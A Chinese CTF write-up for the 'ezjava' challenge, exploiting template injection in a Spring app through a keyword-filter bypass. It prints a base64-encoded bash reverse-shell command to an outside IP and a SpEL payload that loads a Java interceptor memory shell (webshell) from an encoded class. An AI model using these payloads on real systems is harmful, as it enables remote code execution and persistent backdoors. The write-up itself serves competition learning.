1.前言
前一秒還在robots.txt找flag,下一秒就java記憶體馬了,還不出網,這很🏀 👍, 又坐大牢了。
ezjava在比賽時實現了rce了,但可恨的是題目沒回顯,不出網,沒有靜態目錄,也不能設cookie和header頭,看樣子最後只能打記憶體馬了,但本地又沒有存記憶體馬,哎。
2.ezjava
拿到jar包先反編譯,然後本地動調。
public String render_tmp(@RequestParam String str) {
if (!str.contains("new") && !str.contains("spring") && !str.contains("Class") && !str.contains("UNIXProcess") && !str.contains("ProcessBuilder") && !str.contains("Runtime")) {
JetTemplate template = JetEngine.create().createTemplate(str);
StringWriter out = new StringWriter();
template.render((Map)null, out);
System.out.println(out.toString());
return "RCE";
} else {
return "NO RCE";
}
}
}
是一個模板注入/表示式注入的題目,可以看到過濾了一些命令執行相關函式,然後沒有回顯。
先解決第一個問題,如何繞過waf
- 我的思路是讓其進行二次解析,因為
createTemplate函式傳的是個str,就可以利用+繞過關鍵字了。 - 初步payload (根據給的文件和本地動調還是能調出來這個payload的)
str=a=${jetbrick.template.JetEngine::create().createTemplate("").render({},java.lang.System::out)};
- 如果可以出網的話直接命令執行反彈shell就完事了
str=a=${jetbrick.template.JetEngine::create().createTemplate("${java.lang.Run"%2b"time::getRu"%2b"ntime().exec('bash-c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvNDMuMTQyLjE1LjEwLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}')}").render({},java.lang.System::out)};
第二個問題,怎麼回顯。引數裡沒帶response,自然也就沒辦法設定response了。無腦回字串也是無解
public String render_tmp(@RequestParam String str) {}
最終估計是要打個記憶體馬的。
spring帶有spel表示式,我們利用模板引入spel解析器,然後打記憶體馬,(感覺有點多此一舉,他這個模板引擎本身應該就能實現,不過這個有現成的payload,不用白不用)
具體可參考這個連結。
構造payload時間花的不多,但各種引號轉義真讓人頭疼。
最終payload
str=a=${jetbrick.template.JetEngine::create().createTemplate("${ne"%2b"w+org.spr"%2b"ingframework.expression.spel.standard.SpelExpressionParser().parseExpression('T(org.spr'%2b'ingframework.cglib.core.ReflectUtils).defineCla'%2b'ss(\\'InceptorMemShell\\',T(org.spr'%2b'ingframework.util.Base64Utils).decodeFromString(\\'yv66vgAAADQBAAoAOwCKCABWCwCLAIwIAI0LAI4AjwsAjgCQCACRCACSCgCTAJQKAA4AlQgAlgoADgCXBwCYBwCZCACaCACbCgANAJwIAJ0IAJ4HAJ8KAA0AoAoAoQCiCgAUAKMIAKQKABQApQoAFACmCgAUAKcKABQAqAoAqQCqCgCpAKsKAKkAqAcArAoAIACtCwA8AK4LADwArwkAkwCwCACxCgCyAKoKALMAtAgAtQsAtgC3BwC4BwC5CwAqALoHALsIALwKAL0AvgcAvwoAMACtCgDAAMEKAMAAwgcAwwcAxAoANQCtBwDFCgA3AIoLADQAxggAxwcAyAcAyQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQASTEluY2VwdG9yTWVtU2hlbGw7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAB2J1aWxkZXIBABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEAC3ByaW50V3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABbwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQADY21kAQANU3RhY2tNYXBUYWJsZQcAxQcAygcAywcAzAcAmQcAzQcAmAcAnwcArAEACkV4Y2VwdGlvbnMBAApwb3N0SGFuZGxlAQCSKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9Nb2RlbEFuZFZpZXc7KVYBAAxtb2RlbEFuZFZpZXcBAC5Mb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9Nb2RlbEFuZFZpZXc7AQAPYWZ0ZXJDb21wbGV0aW9uAQB5KExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL0V4Y2VwdGlvbjspVgEAAmV4AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcAzgEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAVbWFwcGluZ0hhbmRsZXJNYXBwaW5nAQBUTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmc7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQARYWRhcHRJbnRlcmNlcHRvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAPZXZpbEludGVyY2VwdG9yAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEARkxqYXZhL3V0aWwvTGlzdDxMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3I7PjsHALgHALkHAM8HAL8HAMMHAMQBAApTb3VyY2VGaWxlAQAVSW5jZXB0b3JNZW1TaGVsbC5qYXZhDAA9AD4HAMoMANAA0QEAA2diawcAywwA0gDTDADUANUBAAABAAdvcy5uYW1lBwDWDADXANEMANgA2QEAA3dpbgwA2gDbAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAB2NtZC5leGUBAAIvYwwAPQDcAQAJL2Jpbi9iYXNoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwA3QDeBwDfDADgAOEMAD0A4gEADXdvY2Fvc2luaWRlbWEMAOMA5AwA5QDmDADnANkMAOgAPgcAzQwA6QDTDADqAD4BABNqYXZhL2xhbmcvRXhjZXB0aW9uDADrAD4MAGIAYwwAZgBnDADsAO0BAAZzdGFhcnQHAO4HAO8MAPAA8QEAOW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLnNlcnZsZXQuRGlzcGF0Y2hlclNlcnZsZXQuQ09OVEVYVAcA8gwA8wD0AQA1b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQBAFJvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nDAD1APYBAD5vcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvQWJzdHJhY3RIYW5kbGVyTWFwcGluZwEAE2FkYXB0ZWRJbnRlcmNlcHRvcnMHAPcMAPgA%2bQEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcAzwwA%2bgD7DAD8AP0BAA5qYXZhL3V0aWwvTGlzdAEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAQSW5jZXB0b3JNZW1TaGVsbAwA/gD/AQACb2sBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAyb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3IBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBABBqYXZhL2xhbmcvT2JqZWN0AQATamF2YS9pby9QcmludFdyaXRlcgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABRzZXRDaGFyYWN0ZXJFbmNvZGluZwEAFShMamF2YS9sYW5nL1N0cmluZzspVgEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAqKExqYXZhL2lvL0lucHV0U3RyZWFtO0xqYXZhL2xhbmcvU3RyaW5nOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEAB3ByaW50bG4BAAVmbHVzaAEAD3ByaW50U3RhY2tUcmFjZQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENvbnRleHRIb2xkZXIBABhjdXJyZW50UmVxdWVzdEF0dHJpYnV0ZXMBAD0oKUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXM7AQA5b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzAQAMZ2V0QXR0cmlidXRlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0kpTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0QmVhbgEAJShMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL09iamVjdDsBAA9qYXZhL2xhbmcvQ2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAA2FkZAEAFShMamF2YS9sYW5nL09iamVjdDspWgAhADcAOwABADwAAAAHAAEAPQA%2bAAEAPwAAAC8AAQABAAAABSq3AAGxAAAAAgBAAAAABgABAAAAEgBBAAAADAABAAAABQBCAEMAAAABAEQARQACAD8AAAIFAAYACQAAAL4rEgK5AAMCADoEGQTGALAsEgS5AAUCACy5AAYBADoFEgc6BxIIuAAJtgAKEgu2AAyZACK7AA1ZBr0ADlkDEg9TWQQSEFNZBRkEU7cAEToGpwAfuwANWQa9AA5ZAxISU1kEEhNTWQUZBFO3ABE6BrsAFFkZBrYAFbYAFhIEtwAXEhi2ABk6CBkItgAamQALGQi2ABunAAUZBzoHGQi2ABwZBRkHtgAdGQW2AB4ZBbYAH6cACjoFGQW2ACEDrASsAAEADwCwALMAIAADAEAAAABOABMAAAAsAAoALQAPAC8AFwAwAB8AMgAjADMAMwA0AFIANgBuADgAhgA5AJoAOgCfADsApgA8AKsAPQCwAEAAswA%2bALUAPwC6AEEAvABDAEEAAABwAAsATwADAEYARwAGAB8AkQBIAEkABQBuAEIARgBHAAYAIwCNAEoASwAHAIYAKgBMAE0ACAC1AAUATgBPAAUAAAC%2bAEIAQwAAAAAAvgBQAFEAAQAAAL4AUgBTAAIAAAC%2bAFQAVQADAAoAtABWAEsABABXAAAAYwAH/wBSAAgHAFgHAFkHAFoHAFsHAFwHAF0ABwBcAAD/ABsACAcAWAcAWQcAWgcAWwcAXAcAXQcAXgcAXAAA/AAnBwBfQQcAXP8AGgAFBwBYBwBZBwBaBwBbBwBcAAEHAGAGAQBhAAAABAABACAAAQBiAGMAAgA/AAAAYAAFAAUAAAAKKissLRkEtwAisQAAAAIAQAAAAAoAAgAAAEgACQBJAEEAAAA0AAUAAAAKAEIAQwAAAAAACgBQAFEAAQAAAAoAUgBTAAIAAAAKAFQAVQADAAAACgBkAGUABABhAAAABAABACAAAQBmAGcAAgA/AAAAYAAFAAUAAAAKKissLRkEtwAjsQAAAAIAQAAAAAoAAgAAAE0ACQBOAEEAAAA0AAUAAAAKAEIAQwAAAAAACgBQAFEAAQAAAAoAUgBTAAIAAAAKAFQAVQADAAAACgBoAE8ABABhAAAABAABACAAAQBpAGoAAgA/AAAAPwAAAAMAAAABsQAAAAIAQAAAAAYAAQAAAFMAQQAAACAAAwAAAAEAQgBDAAAAAAABAGsAbAABAAAAAQBtAG4AAgBhAAAABAABAG8AAQBpAHAAAgA/AAAASQAAAAQAAAABsQAAAAIAQAAAAAYAAQAAAFgAQQAAACoABAAAAAEAQgBDAAAAAAABAGsAbAABAAAAAQBxAHIAAgAAAAEAVABzAAMAYQAAAAQAAQBvAAgAdAA%2bAAEAPwAAAWkAAwAFAAAAarIAJBIltgAmuAAnEigDuQApAwDAACpLKhIruQAsAgDAACtMAU0SLRIutgAvTacACE4ttgAxLAS2ADIBTiwrtgAzwAA0TqcACjoEGQS2ADa7ADdZtwA4OgQtGQS5ADkCAFeyACQSOrYAJrEAAgAlAC0AMAAwADwARQBIADUABABAAAAASgASAAAAFQAIABYAFwAXACMAGAAlABoALQAdADAAGwAxABwANQAeADoAHwA8ACEARQAkAEgAIgBKACMATwAlAFgAJgBhACcAaQAoAEEAAABIAAcAMQAEAE4AdQADAEoABQBOAHYABAAXAFIAdwB4AAAAIwBGAHkAegABACUARAB7AHwAAgA8AC0AfQB%2bAAMAWAARAH8AQwAEAIAAAAAMAAEAPAAtAH0AgQADAFcAAAAtAAT/ADAAAwcAggcAgwcAhAABBwCFBP8AEgAEBwCCBwCDBwCEBwCGAAEHAIcGAAEAiAAAAAIAiQ%3d%3d\\'),T(java.lang.Thread).currentThread().getContextCl'%2b'assLoader()).n'%2b'ewInstance()').getValue()}").render({},java.lang.System::out)};
3.注意
- 需要用 java8來啟動jar包,否則payload打不通。
4.總結
- java還不是很熟悉,以後再慢慢學習吧。